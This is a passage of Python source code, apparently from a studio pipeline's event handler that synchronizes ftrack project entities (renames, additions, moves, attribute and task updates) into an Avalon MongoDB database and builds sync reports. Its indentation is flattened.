custom_attrs, hier_attrs = self.avalon_custom_attributes
not_processed_keys = True
if keys:
not_processed_keys = [k for k in keys]
# Notmal custom attributes
processed_keys = []
for attr in custom_attrs:
if not not_processed_keys:
break
key = attr["key"]
if key in processed_keys:
continue
if key not in entity["custom_attributes"]:
continue
if keys:
if key not in keys:
continue
else:
not_processed_keys.remove(key)
output[key] = entity["custom_attributes"][key]
processed_keys.append(key)
if not not_processed_keys:
return output
# Hierarchical cust attrs
hier_keys = []
defaults = {}
for attr in hier_attrs:
key = attr["key"]
if keys and key not in keys:
continue
hier_keys.append(key)
defaults[key] = attr["default"]
hier_values = avalon_sync.get_hierarchical_attributes(
self.process_session, entity, hier_keys, defaults
)
for key, val in hier_values.items():
if key == CUST_ATTR_ID_KEY:
continue
output[key] = val
return output
def process_renamed(self):
ent_infos = self.ftrack_renamed
if not ent_infos:
return
self.log.debug(
"Processing renamed entities: {}".format(str(ent_infos))
)
changeable_queue = queue.Queue()
for ftrack_id, ent_info in ent_infos.items():
entity_type = ent_info["entity_type"]
if entity_type == "Task":
continue
new_name = ent_info["changes"]["name"]["new"]
old_name = ent_info["changes"]["name"]["old"]
ent_path = self.get_ent_path(ftrack_id)
avalon_ent = self.avalon_ents_by_ftrack_id.get(ftrack_id)
if not avalon_ent:
# TODO logging
self.log.debug((
"Entity is not is avalon. Moving to \"add\" process. <{}>"
).format(ent_path))
self.ftrack_added[ftrack_id] = ent_info
continue
if new_name == avalon_ent["name"]:
# TODO logging
self.log.debug((
"Avalon entity already has the same name <{}>"
).format(ent_path))
continue
mongo_id = avalon_ent["_id"]
if self.changeability_by_mongo_id[mongo_id]:
changeable_queue.put((ftrack_id, avalon_ent, new_name))
else:
ftrack_ent = self.ftrack_ents_by_id[ftrack_id]
ftrack_ent["name"] = avalon_ent["name"]
try:
self.process_session.commit()
# TODO logging
# TODO report
error_msg = "Entity renamed back"
report_msg = (
"{}||It is not possible to change"
" the name of an entity or it's parents, "
" if it already contained published data."
).format(error_msg)
self.report_items["info"][report_msg].append(ent_path)
self.log.warning("{} <{}>".format(error_msg, ent_path))
except Exception:
self.process_session.rollback()
# TODO report
# TODO logging
error_msg = (
"Couldn't rename the entity back to its original name"
)
report_msg = (
"{}||Renamed because it is not possible to"
" change the name of an entity or it's parents, "
" if it already contained published data."
).format(error_msg)
error_traceback = (
str(traceback.format_exc()).replace("\n", "<br>")
).replace(" ", " ")
item_msg = ent_path + "<br>" + error_traceback
self.report_items["warning"][report_msg].append(item_msg)
self.log.warning(
"{}: \"{}\"".format(error_msg, ent_path),
exc_info=True
)
old_names = []
# Process renaming in Avalon DB
while not changeable_queue.empty():
ftrack_id, avalon_ent, new_name = changeable_queue.get()
mongo_id = avalon_ent["_id"]
old_name = avalon_ent["name"]
_entity_type = "asset"
if entity_type == "Project":
_entity_type = "project"
passed_regex = avalon_sync.check_regex(
new_name, _entity_type, schema_patterns=self.regex_schemas
)
if not passed_regex:
self.regex_failed.append(ftrack_id)
continue
# if avalon does not have same name then can be changed
same_name_avalon_ent = self.avalon_ents_by_name.get(new_name)
if not same_name_avalon_ent:
old_val = self._avalon_ents_by_name.pop(old_name)
old_val["name"] = new_name
self._avalon_ents_by_name[new_name] = old_val
self.updates[mongo_id] = {"name": new_name}
self.renamed_in_avalon.append(mongo_id)
old_names.append(old_name)
if new_name in old_names:
old_names.remove(new_name)
# TODO logging
ent_path = self.get_ent_path(ftrack_id)
self.log.debug(
"Name of entity will be changed to \"{}\" <{}>".format(
new_name, ent_path
)
)
continue
# Check if same name is in changable_queue
# - it's name may be changed in next iteration
same_name_ftrack_id = same_name_avalon_ent["data"]["ftrackId"]
same_is_unprocessed = False
for item in list(changeable_queue.queue):
if same_name_ftrack_id == item[0]:
same_is_unprocessed = True
break
if same_is_unprocessed:
changeable_queue.put((ftrack_id, avalon_ent, new_name))
continue
self.duplicated.append(ftrack_id)
if old_names:
self.check_names_synchronizable(old_names)
# not_found are not processed since all not found are
# not found because they are not synchronizable
def process_added(self):
ent_infos = self.ftrack_added
if not ent_infos:
return
self.log.debug(
"Processing added entities: {}".format(str(ent_infos))
)
cust_attrs, hier_attrs = self.avalon_cust_attrs
entity_type_conf_ids = {}
# Skip if already exit in avalon db or tasks entities
# - happen when was created by any sync event/action
pop_out_ents = []
for ftrack_id, ent_info in ent_infos.items():
if self.avalon_ents_by_ftrack_id.get(ftrack_id):
pop_out_ents.append(ftrack_id)
self.log.warning(
"Added entity is already synchronized <{}>".format(
self.get_ent_path(ftrack_id)
)
)
continue
entity_type = ent_info["entity_type"]
if entity_type == "Task":
continue
name = (
ent_info
.get("changes", {})
.get("name", {})
.get("new")
)
avalon_ent_by_name = self.avalon_ents_by_name.get(name) or {}
avalon_ent_by_name_ftrack_id = (
avalon_ent_by_name
.get("data", {})
.get("ftrackId")
)
if avalon_ent_by_name and avalon_ent_by_name_ftrack_id is None:
ftrack_ent = self.ftrack_ents_by_id.get(ftrack_id)
if not ftrack_ent:
ftrack_ent = self.process_session.query(
self.entities_query_by_id.format(
self.cur_project["id"], ftrack_id
)
).one()
self.ftrack_ents_by_id[ftrack_id] = ftrack_ent
ent_path_items = [ent["name"] for ent in ftrack_ent["link"]]
parents = ent_path_items[1:len(ent_path_items)-1:]
avalon_ent_parents = (
avalon_ent_by_name.get("data", {}).get("parents")
)
if parents == avalon_ent_parents:
self.dbcon.update_one({
"_id": avalon_ent_by_name["_id"]
}, {
"$set": {
"data.ftrackId": ftrack_id,
"data.entityType": entity_type
}
})
avalon_ent_by_name["data"]["ftrackId"] = ftrack_id
avalon_ent_by_name["data"]["entityType"] = entity_type
self._avalon_ents_by_ftrack_id[ftrack_id] = (
avalon_ent_by_name
)
if self._avalon_ents_by_parent_id:
found = None
for _parent_id_, _entities_ in (
self._avalon_ents_by_parent_id.items()
):
for _idx_, entity in enumerate(_entities_):
if entity["_id"] == avalon_ent_by_name["_id"]:
found = (_parent_id_, _idx_)
break
if found:
break
if found:
_parent_id_, _idx_ = found
self._avalon_ents_by_parent_id[_parent_id_][
_idx_] = avalon_ent_by_name
if self._avalon_ents_by_id:
self._avalon_ents_by_id[avalon_ent_by_name["_id"]] = (
avalon_ent_by_name
)
if self._avalon_ents_by_name:
self._avalon_ents_by_name[name] = avalon_ent_by_name
if self._avalon_ents:
found = None
project, entities = self._avalon_ents
for _idx_, _ent_ in enumerate(entities):
if _ent_["_id"] != avalon_ent_by_name["_id"]:
continue
found = _idx_
break
if found is not None:
entities[found] = avalon_ent_by_name
self._avalon_ents = project, entities
pop_out_ents.append(ftrack_id)
continue
mongo_id_configuration_id = self._mongo_id_configuration(
ent_info,
cust_attrs,
hier_attrs,
entity_type_conf_ids
)
if not mongo_id_configuration_id:
self.log.warning((
"BUG REPORT: Missing MongoID configuration for `{} < {} >`"
).format(entity_type, ent_info["entityType"]))
continue
_entity_key = collections.OrderedDict({
"configuration_id": mongo_id_configuration_id,
"entity_id": ftrack_id
})
self.process_session.recorded_operations.push(
ftrack_api.operation.UpdateEntityOperation(
"ContextCustomAttributeValue",
_entity_key,
"value",
ftrack_api.symbol.NOT_SET,
""
)
)
try:
# Commit changes of mongo_id to empty string
self.process_session.commit()
self.log.debug("Committing unsetting")
except Exception:
self.process_session.rollback()
# TODO logging
msg = (
"Could not set value of Custom attribute, where mongo id"
" is stored, to empty string. Ftrack ids: \"{}\""
).format(", ".join(ent_infos.keys()))
self.log.warning(msg, exc_info=True)
for ftrack_id in pop_out_ents:
ent_infos.pop(ftrack_id)
# sort by parents length (same as by hierarchy level)
_ent_infos = sorted(
ent_infos.values(),
key=(lambda ent_info: len(ent_info.get("parents", [])))
)
to_sync_by_id = collections.OrderedDict()
for ent_info in _ent_infos:
ft_id = ent_info["entityId"]
to_sync_by_id[ft_id] = self.ftrack_ents_by_id[ft_id]
# cache regex success (for tasks)
for ftrack_id, entity in to_sync_by_id.items():
if entity.entity_type.lower() == "project":
raise Exception((
"Project can't be created with event handler!"
"This is a bug"
))
parent_id = entity["parent_id"]
parent_avalon = self.avalon_ents_by_ftrack_id.get(parent_id)
if not parent_avalon:
# TODO logging
self.log.debug((
"Skipping synchronization of entity"
" because parent was not found in Avalon DB <{}>"
).format(self.get_ent_path(ftrack_id)))
continue
is_synchonizable = True
name = entity["name"]
passed_regex = avalon_sync.check_regex(
name, "asset", schema_patterns=self.regex_schemas
)
if not passed_regex:
self.regex_failed.append(ftrack_id)
is_synchonizable = False
if name in self.avalon_ents_by_name:
self.duplicated.append(ftrack_id)
is_synchonizable = False
if not is_synchonizable:
continue
self.create_entity_in_avalon(entity, parent_avalon)
def process_moved(self):
"""
Handles moved entities to different place in hiearchy.
(Not tasks - handled separately.)
"""
if not self.ftrack_moved:
return
self.log.debug(
"Processing moved entities: {}".format(str(self.ftrack_moved))
)
ftrack_moved = {k: v for k, v in sorted(
self.ftrack_moved.items(),
key=(lambda line: len(
(line[1].get("data", {}).get("parents") or [])
))
)}
for ftrack_id, ent_info in ftrack_moved.items():
avalon_ent = self.avalon_ents_by_ftrack_id.get(ftrack_id)
if not avalon_ent:
continue
new_parent_id = ent_info["changes"]["parent_id"]["new"]
old_parent_id = ent_info["changes"]["parent_id"]["old"]
mongo_id = avalon_ent["_id"]
if self.changeability_by_mongo_id[mongo_id]:
par_av_ent = self.avalon_ents_by_ftrack_id.get(new_parent_id)
if not par_av_ent:
# TODO logging
# TODO report
ent_path_items = [self.cur_project["full_name"]]
ent_path_items.extend(avalon_ent["data"]["parents"])
ent_path_items.append(avalon_ent["name"])
ent_path = "/".join(ent_path_items)
error_msg = (
"New parent of entity is not synchronized to avalon"
)
report_msg = (
"{}||Parent in Avalon can't be changed. That"
" may cause issues. Please fix parent or move entity"
" under valid entity."
).format(error_msg)
self.report_items["warning"][report_msg].append(ent_path)
self.log.warning("{} <{}>".format(error_msg, ent_path))
continue
# THIS MUST HAPPEND AFTER CREATING NEW ENTITIES !!!!
# - because may be moved to new created entity
if "data" not in self.updates[mongo_id]:
self.updates[mongo_id]["data"] = {}
vis_par_id = None
if par_av_ent["type"].lower() != "project":
vis_par_id = par_av_ent["_id"]
self.updates[mongo_id]["data"]["visualParent"] = vis_par_id
self.moved_in_avalon.append(mongo_id)
# TODO logging
ent_path_items = [self.cur_project["full_name"]]
ent_path_items.extend(par_av_ent["data"]["parents"])
ent_path_items.append(par_av_ent["name"])
ent_path_items.append(avalon_ent["name"])
ent_path = "/".join(ent_path_items)
self.log.debug((
"Parent of entity ({}) was changed in avalon <{}>"
).format(str(mongo_id), ent_path)
)
else:
avalon_ent = self.avalon_ents_by_id[mongo_id]
avalon_parent_id = avalon_ent["data"]["visualParent"]
if avalon_parent_id is None:
avalon_parent_id = avalon_ent["parent"]
avalon_parent = self.avalon_ents_by_id[avalon_parent_id]
parent_id = avalon_parent["data"]["ftrackId"]
# For cases when parent was deleted at the same time
if parent_id in self.ftrack_recreated_mapping:
parent_id = (
self.ftrack_recreated_mapping[parent_id]
)
ftrack_ent = self.ftrack_ents_by_id.get(ftrack_id)
if not ftrack_ent:
ftrack_ent = self.process_session.query(
self.entities_query_by_id.format(
self.cur_project["id"], ftrack_id
)
).one()
self.ftrack_ents_by_id[ftrack_id] = ftrack_ent
if parent_id == ftrack_ent["parent_id"]:
continue
ftrack_ent["parent_id"] = parent_id
try:
self.process_session.commit()
# TODO logging
# TODO report
msg = "Entity was moved back"
report_msg = (
"{}||Entity can't be moved when"
" it or its children contain published data"
).format(msg)
ent_path = self.get_ent_path(ftrack_id)
self.report_items["info"][report_msg].append(ent_path)
self.log.warning("{} <{}>".format(msg, ent_path))
except Exception:
self.process_session.rollback()
# TODO logging
# TODO report
error_msg = (
"Couldn't moved the entity back to its original parent"
)
report_msg = (
"{}||Moved back because it is not possible to"
" move with an entity or it's parents, "
" if it already contained published data."
).format(error_msg)
error_traceback = (
str(traceback.format_exc()).replace("\n", "<br>")
).replace(" ", " ")
item_msg = ent_path + "<br>" + error_traceback
self.report_items["warning"][report_msg].append(item_msg)
self.log.warning(
"{}: \"{}\"".format(error_msg, ent_path),
exc_info=True
)
def process_updated(self):
"""
Only custom attributes changes should get here
"""
if not self.ftrack_updated:
return
self.log.debug(
"Processing updated entities: {}".format(str(self.ftrack_updated))
)
ent_infos = self.ftrack_updated
ftrack_mongo_mapping = {}
not_found_ids = []
for ftrack_id, ent_info in ent_infos.items():
avalon_ent = self.avalon_ents_by_ftrack_id.get(ftrack_id)
if not avalon_ent:
not_found_ids.append(ftrack_id)
continue
ftrack_mongo_mapping[ftrack_id] = avalon_ent["_id"]
for ftrack_id in not_found_ids:
ent_infos.pop(ftrack_id)
if not ent_infos:
return
cust_attrs, hier_attrs = self.avalon_cust_attrs
cust_attrs_by_obj_id = collections.defaultdict(dict)
for cust_attr in cust_attrs:
key = cust_attr["key"]
if key.startswith("avalon_"):
continue
ca_ent_type = cust_attr["entity_type"]
if ca_ent_type == "show":
cust_attrs_by_obj_id[ca_ent_type][key] = cust_attr
elif ca_ent_type == "task":
obj_id = cust_attr["object_type_id"]
cust_attrs_by_obj_id[obj_id][key] = cust_attr
hier_attrs_keys = [attr["key"] for attr in hier_attrs]
for ftrack_id, ent_info in ent_infos.items():
mongo_id = ftrack_mongo_mapping[ftrack_id]
entType = ent_info["entityType"]
ent_path = self.get_ent_path(ftrack_id)
if entType == "show":
ent_cust_attrs = cust_attrs_by_obj_id.get("show")
else:
obj_type_id = ent_info["objectTypeId"]
ent_cust_attrs = cust_attrs_by_obj_id.get(obj_type_id)
# Ftrack's entity_type does not have defined custom attributes
if ent_cust_attrs is None:
continue
for key, values in ent_info["changes"].items():
if key in hier_attrs_keys:
self.hier_cust_attrs_changes[key].append(ftrack_id)
continue
if key not in ent_cust_attrs:
continue
if "data" not in self.updates[mongo_id]:
self.updates[mongo_id]["data"] = {}
value = values["new"]
self.updates[mongo_id]["data"][key] = value
self.log.debug(
"Setting data value of \"{}\" to \"{}\" <{}>".format(
key, value, ent_path
)
)
if entType != "show" or key != "applications":
continue
# Store apps to project't config
apps_str = ent_info["changes"]["applications"]["new"]
cust_attr_apps = [app for app in apps_str.split(", ") if app]
proj_apps, warnings = (
avalon_sync.get_project_apps(cust_attr_apps)
)
if "config" not in self.updates[mongo_id]:
self.updates[mongo_id]["config"] = {}
self.updates[mongo_id]["config"]["apps"] = proj_apps
for msg, items in warnings.items():
if not msg or not items:
continue
self.report_items["warning"][msg] = items
def process_hier_cleanup(self):
if (
not self.moved_in_avalon and
not self.renamed_in_avalon and
not self.hier_cust_attrs_changes
):
return
parent_changes = []
hier_cust_attrs_ids = []
hier_cust_attrs_keys = []
all_keys = False
for mongo_id in self.moved_in_avalon:
parent_changes.append(mongo_id)
hier_cust_attrs_ids.append(mongo_id)
all_keys = True
for mongo_id in self.renamed_in_avalon:
if mongo_id not in parent_changes:
parent_changes.append(mongo_id)
for key, ftrack_ids in self.hier_cust_attrs_changes.items():
if key.startswith("avalon_"):
continue
for ftrack_id in ftrack_ids:
avalon_ent = self.avalon_ents_by_ftrack_id[ftrack_id]
mongo_id = avalon_ent["_id"]
if mongo_id in hier_cust_attrs_ids:
continue
hier_cust_attrs_ids.append(mongo_id)
if not all_keys and key not in hier_cust_attrs_keys:
hier_cust_attrs_keys.append(key)
# Parents preparation ***
mongo_to_ftrack_parents = {}
missing_ftrack_ents = {}
for mongo_id in parent_changes:
avalon_ent = self.avalon_ents_by_id[mongo_id]
ftrack_id = avalon_ent["data"]["ftrackId"]
if ftrack_id not in self.ftrack_ents_by_id:
missing_ftrack_ents[ftrack_id] = mongo_id
continue
ftrack_ent = self.ftrack_ents_by_id[ftrack_id]
mongo_to_ftrack_parents[mongo_id] = len(ftrack_ent["link"])
if missing_ftrack_ents:
joine_ids = ", ".join(
["\"{}\"".format(id) for id in missing_ftrack_ents.keys()]
)
entities = self.process_session.query(
self.entities_query_by_id.format(
self.cur_project["id"], joine_ids
)
).all()
for entity in entities:
ftrack_id = entity["id"]
self.ftrack_ents_by_id[ftrack_id] = entity
mongo_id = missing_ftrack_ents[ftrack_id]
mongo_to_ftrack_parents[mongo_id] = len(entity["link"])
stored_parents_by_mongo = {}
# sort by hierarchy level
mongo_to_ftrack_parents = [k for k, v in sorted(
mongo_to_ftrack_parents.items(),
key=(lambda item: item[1])
)]
self.log.debug(
"Updating parents and hieararchy because of name/parenting changes"
)
for mongo_id in mongo_to_ftrack_parents:
avalon_ent = self.avalon_ents_by_id[mongo_id]
vis_par = avalon_ent["data"]["visualParent"]
if vis_par in stored_parents_by_mongo:
parents = [par for par in stored_parents_by_mongo[vis_par]]
if vis_par is not None:
parent_ent = self.avalon_ents_by_id[vis_par]
parents.append(parent_ent["name"])
stored_parents_by_mongo[mongo_id] = parents
continue
ftrack_id = avalon_ent["data"]["ftrackId"]
ftrack_ent = self.ftrack_ents_by_id[ftrack_id]
ent_path_items = [ent["name"] for ent in ftrack_ent["link"]]
parents = ent_path_items[1:len(ent_path_items)-1:]
stored_parents_by_mongo[mongo_id] = parents
for mongo_id, parents in stored_parents_by_mongo.items():
avalon_ent = self.avalon_ents_by_id[mongo_id]
cur_par = avalon_ent["data"]["parents"]
if cur_par == parents:
continue
hierarchy = ""
if len(parents) > 0:
hierarchy = os.path.sep.join(parents)
if "data" not in self.updates[mongo_id]:
self.updates[mongo_id]["data"] = {}
self.updates[mongo_id]["data"]["parents"] = parents
self.updates[mongo_id]["data"]["hierarchy"] = hierarchy
# Skip custom attributes if didn't change
if not hier_cust_attrs_ids:
# TODO logging
self.log.debug(
"Hierarchical attributes were not changed. Skipping"
)
self.update_entities()
return
cust_attrs, hier_attrs = self.avalon_cust_attrs
# Hierarchical custom attributes preparation ***
if all_keys:
hier_cust_attrs_keys = [
attr["key"] for attr in hier_attrs if (
not attr["key"].startswith("avalon_")
)
]
mongo_ftrack_mapping = {}
cust_attrs_ftrack_ids = []
# ftrack_parenting = collections.defaultdict(list)
entities_dict = collections.defaultdict(dict)
children_queue = queue.Queue()
parent_queue = queue.Queue()
for mongo_id in hier_cust_attrs_ids:
avalon_ent = self.avalon_ents_by_id[mongo_id]
parent_queue.put(avalon_ent)
ftrack_id = avalon_ent["data"]["ftrackId"]
if ftrack_id not in entities_dict:
entities_dict[ftrack_id] = {
"children": [],
"parent_id": None,
"hier_attrs": {}
}
mongo_ftrack_mapping[mongo_id] = ftrack_id
cust_attrs_ftrack_ids.append(ftrack_id)
children_ents = self.avalon_ents_by_parent_id.get(mongo_id) or []
for children_ent in children_ents:
_ftrack_id = children_ent["data"]["ftrackId"]
if _ftrack_id in entities_dict:
continue
entities_dict[_ftrack_id] = {
"children": [],
"parent_id": None,
"hier_attrs": {}
}
# if _ftrack_id not in ftrack_parenting[ftrack_id]:
# ftrack_parenting[ftrack_id].append(_ftrack_id)
entities_dict[_ftrack_id]["parent_id"] = ftrack_id
if _ftrack_id not in entities_dict[ftrack_id]["children"]:
entities_dict[ftrack_id]["children"].append(_ftrack_id)
children_queue.put(children_ent)
while not children_queue.empty():
avalon_ent = children_queue.get()
mongo_id = avalon_ent["_id"]
ftrack_id = avalon_ent["data"]["ftrackId"]
if ftrack_id in cust_attrs_ftrack_ids:
continue
mongo_ftrack_mapping[mongo_id] = ftrack_id
cust_attrs_ftrack_ids.append(ftrack_id)
children_ents = self.avalon_ents_by_parent_id.get(mongo_id) or []
for children_ent in children_ents:
_ftrack_id = children_ent["data"]["ftrackId"]
if _ftrack_id in entities_dict:
continue
entities_dict[_ftrack_id] = {
"children": [],
"parent_id": None,
"hier_attrs": {}
}
entities_dict[_ftrack_id]["parent_id"] = ftrack_id
if _ftrack_id not in entities_dict[ftrack_id]["children"]:
entities_dict[ftrack_id]["children"].append(_ftrack_id)
children_queue.put(children_ent)
while not parent_queue.empty():
avalon_ent = parent_queue.get()
if avalon_ent["type"].lower() == "project":
continue
ftrack_id = avalon_ent["data"]["ftrackId"]
vis_par = avalon_ent["data"]["visualParent"]
if vis_par is None:
vis_par = avalon_ent["parent"]
parent_ent = self.avalon_ents_by_id[vis_par]
parent_ftrack_id = parent_ent["data"]["ftrackId"]
if parent_ftrack_id not in entities_dict:
entities_dict[parent_ftrack_id] = {
"children": [],
"parent_id": None,
"hier_attrs": {}
}
if ftrack_id not in entities_dict[parent_ftrack_id]["children"]:
entities_dict[parent_ftrack_id]["children"].append(ftrack_id)
entities_dict[ftrack_id]["parent_id"] = parent_ftrack_id
if parent_ftrack_id in cust_attrs_ftrack_ids:
continue
mongo_ftrack_mapping[vis_par] = parent_ftrack_id
cust_attrs_ftrack_ids.append(parent_ftrack_id)
# if ftrack_id not in ftrack_parenting[parent_ftrack_id]:
# ftrack_parenting[parent_ftrack_id].append(ftrack_id)
parent_queue.put(parent_ent)
# Prepare values to query
entity_ids_joined = ", ".join([
"\"{}\"".format(id) for id in cust_attrs_ftrack_ids
])
attributes_joined = ", ".join([
"\"{}\"".format(name) for name in hier_cust_attrs_keys
])
queries = [{
"action": "query",
"expression": (
"select value, entity_id from CustomAttributeValue "
"where entity_id in ({}) and configuration.key in ({})"
).format(entity_ids_joined, attributes_joined)
}]
if hasattr(self.process_session, "call"):
[values] = self.process_session.call(queries)
else:
[values] = self.process_session._call(queries)
ftrack_project_id = self.cur_project["id"]
for attr in hier_attrs:
key = attr["key"]
if key not in hier_cust_attrs_keys:
continue
entities_dict[ftrack_project_id]["hier_attrs"][key] = (
attr["default"]
)
# PREPARE DATA BEFORE THIS
avalon_hier = []
for value in values["data"]:
if value["value"] is None:
continue
entity_id = value["entity_id"]
key = value["configuration"]["key"]
entities_dict[entity_id]["hier_attrs"][key] = value["value"]
# Get dictionary with not None hierarchical values to pull to childs
project_values = {}
for key, value in (
entities_dict[ftrack_project_id]["hier_attrs"].items()
):
if value is not None:
project_values[key] = value
for key in avalon_hier:
value = entities_dict[ftrack_project_id]["avalon_attrs"][key]
if value is not None:
project_values[key] = value
hier_down_queue = queue.Queue()
hier_down_queue.put((project_values, ftrack_project_id))
while not hier_down_queue.empty():
hier_values, parent_id = hier_down_queue.get()
for child_id in entities_dict[parent_id]["children"]:
_hier_values = hier_values.copy()
for name in hier_cust_attrs_keys:
value = entities_dict[child_id]["hier_attrs"].get(name)
if value is not None:
_hier_values[name] = value
entities_dict[child_id]["hier_attrs"].update(_hier_values)
hier_down_queue.put((_hier_values, child_id))
ftrack_mongo_mapping = {}
for mongo_id, ftrack_id in mongo_ftrack_mapping.items():
ftrack_mongo_mapping[ftrack_id] = mongo_id
for ftrack_id, data in entities_dict.items():
mongo_id = ftrack_mongo_mapping[ftrack_id]
avalon_ent = self.avalon_ents_by_id[mongo_id]
ent_path = self.get_ent_path(ftrack_id)
# TODO logging
self.log.debug(
"Updating hierarchical attributes <{}>".format(ent_path)
)
for key, value in data["hier_attrs"].items():
if (
key in avalon_ent["data"] and
avalon_ent["data"][key] == value
):
continue
self.log.debug("- {}: {}".format(key, value))
if "data" not in self.updates[mongo_id]:
self.updates[mongo_id]["data"] = {}
self.updates[mongo_id]["data"][key] = value
self.update_entities()
def process_task_updates(self):
"""
Pull task information for selected ftrack ids to replace stored
existing in Avalon.
Solves problem of changing type (even Status in the future) of
task without storing ftrack id for task in the DB. (Which doesn't
bring much advantage currently and it could be troublesome for
all hosts or plugins (for example Nuke) to collect and store.
Returns:
None
"""
self.log.debug(
"Processing task changes for parents: {}".format(
self.modified_tasks_ftrackids
)
)
if not self.modified_tasks_ftrackids:
return
joined_ids = ", ".join([
"\"{}\"".format(ftrack_id)
for ftrack_id in self.modified_tasks_ftrackids
])
task_entities = self.process_session.query(
self.task_entities_query_by_parent_id.format(
self.cur_project["id"], joined_ids
)
).all()
ftrack_mongo_mapping_found = {}
not_found_ids = []
# Make sure all parents have updated tasks, as they may not have any
tasks_per_ftrack_id = {
ftrack_id: {}
for ftrack_id in self.modified_tasks_ftrackids
}
# Query all task types at once
task_types = self.process_session.query(self.task_types_query).all()
task_types_by_id = {
task_type["id"]: task_type
for task_type in task_types
}
# prepare all tasks per parentId, eg. Avalon asset record
for task_entity in task_entities:
task_type = task_types_by_id[task_entity["type_id"]]
ftrack_id = task_entity["parent_id"]
if ftrack_id not in tasks_per_ftrack_id:
tasks_per_ftrack_id[ftrack_id] = {}
passed_regex = avalon_sync.check_regex(
task_entity["name"], "task",
schema_patterns=self.regex_schemas
)
if not passed_regex:
self.regex_failed.append(task_entity["id"])
continue
tasks_per_ftrack_id[ftrack_id][task_entity["name"]] = {
"type": task_type["name"]
}
# find avalon entity by parentId
# should be there as create was run first
for ftrack_id in tasks_per_ftrack_id.keys():
avalon_entity = self.avalon_ents_by_ftrack_id.get(ftrack_id)
if not avalon_entity:
not_found_ids.append(ftrack_id)
continue
ftrack_mongo_mapping_found[ftrack_id] = avalon_entity["_id"]
self._update_avalon_tasks(
ftrack_mongo_mapping_found,
tasks_per_ftrack_id
)
def update_entities(self):
"""
Update Avalon entities by mongo bulk changes.
Expects self.updates which are transfered to $set part of update
command.
Resets self.updates afterwards.
"""
mongo_changes_bulk = []
for mongo_id, changes in self.updates.items():
filter = {"_id": mongo_id}
avalon_ent = self.avalon_ents_by_id[mongo_id]
is_project = avalon_ent["type"] == "project"
change_data = avalon_sync.from_dict_to_set(changes, is_project)
mongo_changes_bulk.append(UpdateOne(filter, change_data))
if not mongo_changes_bulk:
return
self.dbcon.bulk_write(mongo_changes_bulk)
self.updates = collections.defaultdict(dict)
@property
def duplicated_report(self):
if not self.duplicated:
return []
ft_project = self.cur_project
duplicated_names = []
for ftrack_id in self.duplicated:
ftrack_ent = self.ftrack_ents_by_id.get(ftrack_id)
if not ftrack_ent:
ftrack_ent = self.process_session.query(
self.entities_query_by_id.format(
ft_project["id"], ftrack_id
)
).one()
self.ftrack_ents_by_id[ftrack_id] = ftrack_ent
name = ftrack_ent["name"]
if name not in duplicated_names:
duplicated_names.append(name)
joined_names = ", ".join(
["\"{}\"".format(name) for name in duplicated_names]
)
ft_ents = self.process_session.query(
self.entities_name_query_by_name.format(
ft_project["id"], joined_names
)
).all()
ft_ents_by_name = collections.defaultdict(list)
for ft_ent in ft_ents:
name = ft_ent["name"]
ft_ents_by_name[name].append(ft_ent)
if not ft_ents_by_name:
return []
subtitle = "Duplicated entity names:"
items = []
items.append({
"type": "label",
"value": "# {}".format(subtitle)
})
items.append({
"type": "label",
"value": (
"<p><i>NOTE: It is not allowed to use the same name"
" for multiple entities in the same project</i></p>"
)
})
for name, ents in ft_ents_by_name.items():
items.append({
"type": "label",
"value": "## {}".format(name)
})
paths = []
for ent in ents:
ftrack_id = ent["id"]
ent_path = "/".join([_ent["name"] for _ent in ent["link"]])
avalon_ent = self.avalon_ents_by_id.get(ftrack_id)
if avalon_ent:
additional = " (synchronized)"
if avalon_ent["name"] != name:
additional = " (synchronized as {})".format(
avalon_ent["name"]
)
ent_path += additional
paths.append(ent_path)
items.append({
"type": "label",
"value": '<p>{}</p>'.format("<br>".join(paths))
})
return items
@property
def regex_report(self):
if not self.regex_failed:
return []
subtitle = "Entity names contain prohibited symbols:"
items = []
items.append({
"type": "label",
"value": "# {}".format(subtitle)
})
items.append({
"type": "label",
"value": (
"<p><i>NOTE: You can use Letters( a-Z ),"
" Numbers( 0-9 ) and Underscore( _ )</i></p>"
)
})
ft_project = self.cur_project
for ftrack_id in self.regex_failed:
ftrack_ent = self.ftrack_ents_by_id.get(ftrack_id)
if not ftrack_ent:
ftrack_ent = self.process_session.query(
self.entities_query_by_id.format(
ft_project["id"], ftrack_id
)
).one()
self.ftrack_ents_by_id[ftrack_id] = ftrack_ent
name = ftrack_ent["name"]
ent_path_items = [_ent["name"] for _ent in ftrack_ent["link"][:-1]]
ent_path_items.append("<strong>{}</strong>".format(name))
ent_path = "/".join(ent_path_items)
items.append({
"type": "label",
"value": "<p>{} - {}</p>".format(name, ent_path)
})
return items
def report(self):
msg_len = len(self.duplicated) + len(self.regex_failed)
for msgs in self.report_items.values():
msg_len += len(msgs)
if msg_len == 0:
return
items = []
project_name = self.cur_project["full_name"]
title = "Synchronization report ({}):".format(project_name)
keys = ["error", "warning", "info"]
for key in keys:
subitems = []
if key == "warning":
subitems.extend(self.duplicated_report)
subitems.extend(self.regex_report)
for _msg, _items in self.report_items[key].items():
if not _items:
continue
msg_items = _msg.split("||")
msg = msg_items[0]
subitems.append({
"type": "label",
"value": "# {}".format(msg)
})
if len(msg_items) > 1:
for note in msg_items[1:]:
subitems.append({
"type": "label",
"value": "<p><i>NOTE: {}</i></p>".format(note)
})
if isinstance(_items, str):
_items = [_items]
subitems.append({
"type": "label",
"value": '<p>{}</p>'.format("<br>".join(_items))
})
if items and subitems:
items.append(self.report_splitter)
items.extend(subitems)
self.show_interface(
items=items,
title=title,
event=self._cur_event
)
return True
def _update_avalon_tasks(
self, ftrack_mongo_mapping_found, tasks_per_ftrack_id
):
"""
Prepare new "tasks" content for existing records in Avalon.
Args:
ftrack_mongo_mapping_found (dictionary): ftrack parentId to
Avalon _id mapping
tasks_per_ftrack_id (dictionary): task dictionaries per ftrack
parentId
Returns:
None
"""
mongo_changes_bulk = []
for ftrack_id, mongo_id in ftrack_mongo_mapping_found.items():
filter = {"_id": mongo_id}
change_data = {"$set": {}}
change_data["$set"]["data.tasks"] = tasks_per_ftrack_id[ftrack_id]
mongo_changes_bulk.append(UpdateOne(filter, change_data))
if mongo_changes_bulk:
self.dbcon.bulk_write(mongo_changes_bulk)
def _mongo_id_configuration(
self,
ent_info,
cust_attrs,
hier_attrs,
temp_dict
):
# Use hierarchical mongo id attribute if possible.
if "_hierarchical" not in temp_dict:
hier_mongo_id_configuration_id = None
for attr in hier_attrs:
if attr["key"] == CUST_ATTR_ID_KEY:
hier_mongo_id_configuration_id = attr["id"]
break
